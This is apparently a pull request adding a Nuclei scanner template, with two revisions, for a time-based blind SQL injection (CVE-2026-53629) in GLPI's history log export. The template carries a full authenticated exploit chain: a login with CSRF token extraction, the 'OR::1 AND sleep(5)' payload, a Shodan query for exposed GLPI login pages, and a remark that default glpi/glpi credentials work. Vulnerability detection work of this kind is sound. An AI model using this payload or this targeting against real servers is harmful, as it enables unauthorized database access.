### PR TITLE
Add CVE-2026-53629 GLPI blind SQLi in history log filter (LogBleed)

### DIFF
--- a/http/cves/2026/CVE-2026-53629.yaml
+++ b/http/cves/2026/CVE-2026-53629.yaml
@@ -1,0 +1,90 @@
+id: CVE-2026-53629
+
+info:
+  name: GLPI - Blind SQL Injection in History Log Filter (LogBleed)
+  author: Boreas37
+  severity: high
+  description: |
+    GLPI versions before 10.0.26 and 11.0.8 are vulnerable to a blind SQL
+    injection in the history log filter. The Log::convertFiltersValuesToSqlCriteria()
+    function splits the affected_fields filter into key:operator:value parts and
+    DBmysqlIterator::analyseCrit() does not quote OR, AND and NOT as column names,
+    allowing an authenticated user with logs READ right to inject arbitrary SQL.
+    Verified against glpi/glpi:10.0.25 (Docker + MariaDB): filter
+    "OR::1 AND sleep(5)" produces "... AND (((((1 AND sleep(5))))))" in the query
+    and the request takes ~5s. On 10.0.26 the same payload is rejected (~30ms).
+  reference:
+    - https://github.com/glpi-project/glpi/security/advisories/GHSA-cpcj-x335-5cmh
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-53629
+    cwe-id: CWE-89
+  metadata:
+    max-request: 4
+    verified: true
+  tags: cve,cve2026,glpi,sqli,blind,time-based,authenticated
+
+http:
+  - raw:
+      # 1. Ana sayfa — session + random login field adları + CSRF token
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      # 2. Login — random field adlarıyla POST
+      - |
+        POST /front/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        {{uname}}={{username}}&{{pwd}}={{password}}&_glpi_csrf_token={{token}}&submit=Login
+
+      # 3. Log'u olan bir item (glpi user id=2, super-admin)
+      - |
+        GET /front/user.form.php?id=2 HTTP/1.1
+        Host: {{Hostname}}
+
+      # 4. SQLi — time-based sleep(5)
+      - |
+        GET /front/log/export.php?itemtype=User&id=2&filter%5Baffected_fields%5D%5B0%5D=OR::1%20AND%20sleep(5) HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 3
+
+    extractors:
+      - type: regex
+        name: uname
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - 'id="login_name" name="([^"]+)"'
+
+      - type: regex
+        name: pwd
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - 'id="login_password" name="([^"]+)"'
+
+      - type: regex
+        name: token
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - '_glpi_csrf_token" value="([a-f0-9]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - "duration >= 4 && duration <= 9"

--- a/http/cves/2026/CVE-2026-53629.yaml
+++ b/http/cves/2026/CVE-2026-53629.yaml
@@ -5,8 +5,7 @@ info:
   author: Boreas37
   severity: high
   description: |
-    GLPI versions before 10.0.26 and 11.0.8 are vulnerable to a blind SQL injection in the history log filter. The Log::convertFiltersValuesToSqlCriteria() function splits the affected_fields filter into key:operator:value parts and
-    DBmysqlIterator::analyseCrit() does not quote OR, AND and NOT as column names, allowing an authenticated user with logs READ right to inject arbitrary SQL. Verified against glpi/glpi:10.0.25 (Docker + MariaDB): filter "OR::1 AND sleep(5)" produces "... AND (((((1 AND sleep(5))))))" in the query and the request takes ~5s. On 10.0.26 the same payload is rejected (~30ms).
+    GLPI versions before 10.0.26 and 11.0.8 are vulnerable to a blind SQL injection in the history log filter. The Log::convertFiltersValuesToSqlCriteria() function splits the affected_fields filter into key:operator:value parts and DBmysqlIterator::analyseCrit() does not quote OR, AND and NOT as column names, allowing an authenticated user with logs READ right to inject arbitrary SQL. Verified against glpi/glpi:10.0.25 (Docker + MariaDB): filter "OR::1 AND sleep(5)" produces "... AND (((((1 AND sleep(5))))))" in the query and the request takes ~5s. On 10.0.26 the same payload is rejected (~30ms).
   reference:
     - https://github.com/glpi-project/glpi/security/advisories/GHSA-cpcj-x335-5cmh
   classification:
@@ -93,10 +92,9 @@ http:
 
   - raw:
       - |
+        @timeout: 30s
         GET /front/log/export.php?itemtype=User&id=2&filter%5Baffected_fields%5D%5B0%5D=OR::1%20AND%20sleep(5) HTTP/1.1
         Host: {{Hostname}}
-
-    cookie-reuse: true
 
     matchers-condition: and
     matchers:

--- a/http/cves/2026/CVE-2026-53629.yaml
+++ b/http/cves/2026/CVE-2026-53629.yaml
@@ -5,14 +5,8 @@ info:
   author: Boreas37
   severity: high
   description: |
-    GLPI versions before 10.0.26 and 11.0.8 are vulnerable to a blind SQL
-    injection in the history log filter. The Log::convertFiltersValuesToSqlCriteria()
-    function splits the affected_fields filter into key:operator:value parts and
-    DBmysqlIterator::analyseCrit() does not quote OR, AND and NOT as column names,
-    allowing an authenticated user with logs READ right to inject arbitrary SQL.
-    Verified against glpi/glpi:10.0.25 (Docker + MariaDB): filter
-    "OR::1 AND sleep(5)" produces "... AND (((((1 AND sleep(5))))))" in the query
-    and the request takes ~5s. On 10.0.26 the same payload is rejected (~30ms).
+    GLPI versions before 10.0.26 and 11.0.8 are vulnerable to a blind SQL injection in the history log filter. The Log::convertFiltersValuesToSqlCriteria() function splits the affected_fields filter into key:operator:value parts and
+    DBmysqlIterator::analyseCrit() does not quote OR, AND and NOT as column names, allowing an authenticated user with logs READ right to inject arbitrary SQL. Verified against glpi/glpi:10.0.25 (Docker + MariaDB): filter "OR::1 AND sleep(5)" produces "... AND (((((1 AND sleep(5))))))" in the query and the request takes ~5s. On 10.0.26 the same payload is rejected (~30ms).
   reference:
     - https://github.com/glpi-project/glpi/security/advisories/GHSA-cpcj-x335-5cmh
   classification:
@@ -23,36 +17,25 @@ info:
   metadata:
     max-request: 4
     verified: true
+    shodan-query: title:"Authentication - GLPI"
   tags: cve,cve2026,glpi,sqli,blind,time-based,authenticated
+
+flow: http(1) && http(2) && http(3) && http(4)
 
 http:
   - raw:
-      # 1. Ana sayfa — session + random login field adları + CSRF token
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
 
-      # 2. Login — random field adlarıyla POST
-      - |
-        POST /front/login.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        {{uname}}={{username}}&{{pwd}}={{password}}&_glpi_csrf_token={{token}}&submit=Login
-
-      # 3. Log'u olan bir item (glpi user id=2, super-admin)
-      - |
-        GET /front/user.form.php?id=2 HTTP/1.1
-        Host: {{Hostname}}
-
-      # 4. SQLi — time-based sleep(5)
-      - |
-        GET /front/log/export.php?itemtype=User&id=2&filter%5Baffected_fields%5D%5B0%5D=OR::1%20AND%20sleep(5) HTTP/1.1
-        Host: {{Hostname}}
-
-    cookie-reuse: true
-    redirects: true
-    max-redirects: 3
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'id="login_name"'
+          - '_glpi_csrf_token'
+        condition: and
+        internal: true
 
     extractors:
       - type: regex
@@ -79,12 +62,51 @@ http:
         regex:
           - '_glpi_csrf_token" value="([a-f0-9]+)"'
 
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
+  - raw:
+      - |
+        POST /front/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
+        {{uname}}={{username}}&{{pwd}}={{password}}&_glpi_csrf_token={{token}}&submit=Login
+
+    redirects: true
+    max-redirects: 3
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "logout.php"
+        internal: true
+
+  - raw:
+      - |
+        GET /front/user.form.php?id=2 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
       - type: dsl
         dsl:
-          - "duration >= 4 && duration <= 9"
+          - "status_code == 200"
+        internal: true
+
+  - raw:
+      - |
+        GET /front/log/export.php?itemtype=User&id=2&filter%5Baffected_fields%5D%5B0%5D=OR::1%20AND%20sleep(5) HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "duration >= 5"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "ID;Date;User;Field;Update"


### PR DESCRIPTION
### CVE-2026-53629 — GLPI Blind SQLi (LogBleed)

Reopening per the review note on #16809 ("no login step and no public PoC, feel free to reopen if you have enough to demonstrate"). This PR now includes **full login flow + verified time-based PoC**.

**Vulnerability:** `Log::convertFiltersValuesToSqlCriteria()` splits the `affected_fields` filter into key:operator:value; `DBmysqlIterator::analyseCrit()` does not quote `OR`/`AND`/`NOT` as column names → authenticated user (logs READ) can inject arbitrary SQL.

**Verification (real Docker labs):**
- ✅ glpi/glpi:**10.0.25** (MariaDB): `filter[affected_fields][0]=OR::1 AND sleep(5)` → request takes **~5s**, SQL log confirms `AND (((((1 AND sleep(5))))))`
- ✅ glpi/glpi:**10.0.26** (fixed): same payload → **no delay** (whitelist rejects the OR key)
- ✅ Template: CSRF token + per-session random login field names extracted, cookie-reuse, time-based matcher (duration 4-9s)
- ✅ `nuclei -validate` passed

**Note:** requires a valid GLPI account (default glpi/glpi or any user with logs READ).